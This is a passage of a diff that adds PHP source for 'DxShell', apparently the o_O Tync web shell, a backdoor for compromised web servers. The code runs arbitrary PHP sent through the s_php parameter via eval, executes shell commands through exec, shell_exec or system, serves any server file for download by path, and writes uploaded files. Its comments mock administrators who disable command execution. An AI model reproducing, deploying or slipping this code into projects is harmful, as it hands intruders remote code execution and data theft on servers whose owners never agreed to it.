+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = @escapeshellarg($f);
+			return @trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{
if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{
	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{
	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{
	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
+	{ /* IMGS are allowed without passwd =) */
	$GLOB['SHELL']['USER']['Login']='';
+	$GLOB['SHELL']['USER']['Passw']='';
+	}
+
+if (	isset($_GET['dxinstant'])?$_GET['dxinstant']=='logoff':false   )
+	{
+	if ($DXGLOBALSHIT)
+		{
		if (isset($_COOKIE['DxS_AuthC'])) DxSetCookie('DxS_AuthC','---', 1);
+		}
+		else
+		{
+		header('WWW-Authenticate: Basic realm="==== HIT CANCEL OR PRESS ESC ===='.base_convert(crc32(mt_rand(0, time())),10,36).'"');
		header('HTTP/1.0 401 Unauthorized');
+		}
+
+	print '<html>Redirecting... press <a href="'.DxURL('kill','').'">here if shit happens</a>';
+	DxGotoURL(DxURL('kill',''), '1noheaders');
+	die();
+	}
+
+if (((strlen($GLOB['SHELL']['USER']['Login'])+strlen($GLOB['SHELL']['USER']['Passw']))>=2))
+	{
	if ($DXGLOBALSHIT)
+		{
		if (isset($_POST['DxS_Auth']) or isset($_COOKIE['DxS_AuthC']))
+			{
			if (!(
+
+				((@$_POST['DxS_Auth']['L']==$GLOB['SHELL']['USER']['Login']) AND /* form */
+				(@$_POST['DxS_Auth']['P']==$GLOB['SHELL']['USER']['Passw']
+							OR
+				(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND @$_POST['DxS_Auth']['P']==md5($GLOB['SHELL']['USER']['Passw']))
+				))
+						OR
+				@$_COOKIE['DxS_AuthC']==md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']) /* cookie */
+
+				))
+				{print(DxError('Fucked off brutally'));unset($_POST['DxS_Auth'], $_COOKIE['DxS_AuthC']);}
+				else DxSetCookie('DxS_AuthC', md5($GLOB['SHELL']['USER']['Login'].$GLOB['SHELL']['USER']['Passw']), time()+60*60*24*2);
+				}
+		if (!isset($_POST['DxS_Auth']) AND !isset($_COOKIE['DxS_AuthC']))
+			{
+			print "\n".'<form action="'.DxURL('kill', '').'" method=POST style="position:absolute;z-index:100;top:0pt;left:40%;width:100%;height:100%;">';
+			print "\n".'<br><input type=text name="DxS_Auth[L]" value="<LOGIN>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=text name="DxS_Auth[P]" value="<PASSWORD>" 	onfocus="this.value=\'\'"  style="width:200pt">';
+			print "\n".'<br><input type=submit value="Ok" style="width:200pt;"></form>';
+			print "\n".'</form>';
+			die();
+			}
+		}
+		else
+		{
+		if (!isset($_SERVER['PHP_AUTH_USER']))
+			{
+			header('WWW-Authenticate: Basic realm="DxShell '.$GLOB['SHELL']['Ver'].' Auth"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+			else
+			if (!(	$_SERVER['PHP_AUTH_USER']==$GLOB['SHELL']['USER']['Login']
+			AND (
+					$_SERVER['PHP_AUTH_PW']==$GLOB['SHELL']['USER']['Passw']
+								OR
+					(strlen($GLOB['SHELL']['USER']['Passw'])==32 AND md5($_SERVER['PHP_AUTH_PW'])==$GLOB['SHELL']['USER']['Passw'])
+					)
+					))
+			{
+			header('WWW-Authenticate: Basic realm="DxS '.$GLOB['SHELL']['Ver'].' Auth: Fucked off brutally"');
+			header('HTTP/1.0 401 Unauthorized');
+			/* Result if user hits cancel button */
+			unset($_GET['dxinstant']);
+			die(DxError('Fucked off brutally'));
+			}
+		}
+	}
+
+###################################################################################
+####################++++++# I N S T A N T    U S A G E #+++++++####################
+###################################################################################
+if (!isset($_GET['dxmode'])) $_GET['dxmode']='DIR'; else $_GET['dxmode']=strtoupper($_GET['dxmode']);
+if ($_GET['dxmode']=='DDOS') /* DDOS mode. In other case, EVALer of everything that comes in $_GET['s_php'] OR $_POST['s_php']  */
+	{
+	$F = $_GET + $_POST;
+	if (!isset($F['s_php'])) die('o_O Tync DDOS Remote Shell '.$GLOB['SHELL']['Ver']."\n".'<br>Use GET or POST to set "s_php" variable with code to be executed =)<br>Enjoy!');
+	eval(stripslashes($F['s_php']));
+	die("\n\n".'<br><br>'.'o_O Tync DDOS Web Shell '.$GLOB['SHELL']['Ver'].((!isset($F['s_php']))?"\n".'<br>'.'$s_php is responsible for php-code-injection':''));
+	}
+if ($_GET['dxmode']=='IMG')
+	{
+	$IMGS=array(
+		'DxS'	=> 'R0lGODlhEAAQAIAAAAD/AAAAACwAAAAAEAAQAAACL4yPGcCs2NqLboGFaXW3X/tx2WcZm0luIcqFKyuVHRSLJOhmGI4mWqQAUoKPYqIAADs=',
+		'folder'=> 'R0lGODlhDwAMAJEAAP7rhriFIP///wAAACH5BAEAAAIALAAAAAAPAAwAAAIklIJhywcPVDMBwpSo3U/WiIVJxG0IWV7Vl4Joe7Jp3HaHKAoFADs=',
+		'foldup'=> 'R0lGODlhDwAMAJEAAP7rhriFIAAAAP///yH5BAEAAAMALAAAAAAPAAwAAAIw3IJiywcgRGgrvCgA2tNh/Dxd8JUcApWgaJFqxGpp+GntFV4ZauV5xPP5JIeTcVIAADs=',
+		'view'	=> 'R0lGODlhEAAJAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQAAkAAAIglB8Zx6aQYGIRyCpFsFY9jl1ft4Fe2WmoZ1LROzWIIhcAOw==',
+		'del'	=> 'R0lGODlhEAAQAKIAAIoRGNYnOtclPv///////wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAANASArazQ4MGOcLwb6BGQBYBknhR3zhRHYUKmQc65xgKM+0beKn3fErm2bDqomIRaMluENhlrcFaEejPKgL3qmRAAA7',
+		'copy'	=> 'R0lGODlhEAAQAKIAAP//lv///3p6egAAAP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAQABAAAAM+SKrT7isOQGsII7Jq7/sTdWEh53FAgwLjILxp2WGculIurL68XsuonCAG6PFSvxvuuDMOQcCaZuJ8TqGQSAIAOw==',
+		'move'	=> 'R0lGODlhEAAQAJEAADyFFLniPu79wP///yH5BAEAAAMALAAAAAAQABAAAAI3nD8AyAgiVnMihDidldmAnXFfIB6Pomwo9kCu5bqpRdf18qGjTpom6AkBO4lhqHLhCHtEj/JQAAA7',
+		'exec'	=> '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',
+		'rename'=> 'R0lGODlhEAAQAJEAAP///wAAAP///wAAACH5BAEAAAIALAAAAAAQABAAAAIxlI8GC+kCQmgPxVmtpBnurnzgxWUk6GFKQp0eFzXnhdHLRm/SPvPp5IodhC4IS8EoAAA7',
+		'ed'	=> 'R0lGODlhEAAQAKIAAAAzZv////3Tm8DAwJ7R/Gmd0P///wAAACH5BAEAAAYALAAAAAAQABAAAANDaAYM+lABIVqEs4bArtRc0V3MMDAEMWLACRSp6kRNYcfrw9h3mksvHm7G4sF8RF3Q1kgqmZSKZ/HKSKeN6I/VdGIZCQA7',
+		'downl' => 'R0lGODlhEAAQAJEAADyFFIXQLajcOf///yH5BAEAAAMALAAAAAAQABAAAAI6nAepeY0CI3AHREmNvWLmfXkUiH1clz1CUGoLu0JLwtaxzU5WwK89HxABgESgSFM0fpJHx5DWHCkoBQA7',
+		'gzip'	=> 'R0lGODlhEAAQAKIAAARLsHi+//zZWLJ9DvEZAf///wAAAAAAACH5BAEAAAUALAAAAAAQABAAAANCWLrQDkuMKUC4OMAyiB+Pc0GDYJ7nUFgk6qos56KwJs9m3eLSapc83Q0nnBhDjdGCkcFslgrkEwq9UKHS6dLShCQAADs=',
+		);
+	@ob_clean();
+	if ((!isset($_GET['dximg'])) OR (!in_array($_GET['dximg'], array_keys($IMGS)))) $_GET['dximg']='noone';
+	header('Cache-Control: public');
+	Header('Last-Modified: '.gmdate('D, d M Y H:i:s', time()-60*60*24*365).' GMT');   //Date('r'
+	header('Expires: '.gmdate('D, d M Y H:i:s', time()+60*60*24*365).' GMT');
+	header('Content-type: image/gif');
+	print  base64_decode(   (is_array(($IMGS[$_GET['dximg']])))?$IMGS[$_GET['dximg']][1]:$IMGS[$_GET['dximg']]   );
+	die();
+	}
+
+if ($_GET['dxmode']=='F_DWN')
+	{
+	if (!isset($_GET['dxfile'])) 		die(DxError('No file selected. Check $_GET[\'dxfile\'] var'));
+	if (!file_exists($_GET['dxfile']))  die(DxError('No such file'));
+	if (!is_file($_GET['dxfile'])) 		die(DxError('Hey! Find out how to read a directory in notepad, and u can call me "Lame" =) '));
+
+	$DxDOWNLOAD_File=array(); /* prepare struct */
+	$DxDOWNLOAD_File['filename']=basename($_GET['dxfile']);
+	if (isset($_GET['dxparam']))
+		$DxDOWNLOAD_File['headers'][]=('Content-type: text/plain'); /* usual look thru */
+		else
+		{
		$DxDOWNLOAD_File['headers'][]=('Content-type: '.mime_content_type($_GET['dxfile']));
+		$DxDOWNLOAD_File['headers'][]=('Content-disposition: attachment; filename="'.basename($_GET['dxfile']).'";');
+		}
+	$DxDOWNLOAD_File['content']=file_get_contents($_GET['dxfile']);
+	}
+
+if ($_GET['dxmode']=='SQL' AND isset($_POST['dxparam']))
+	{/* download query results */
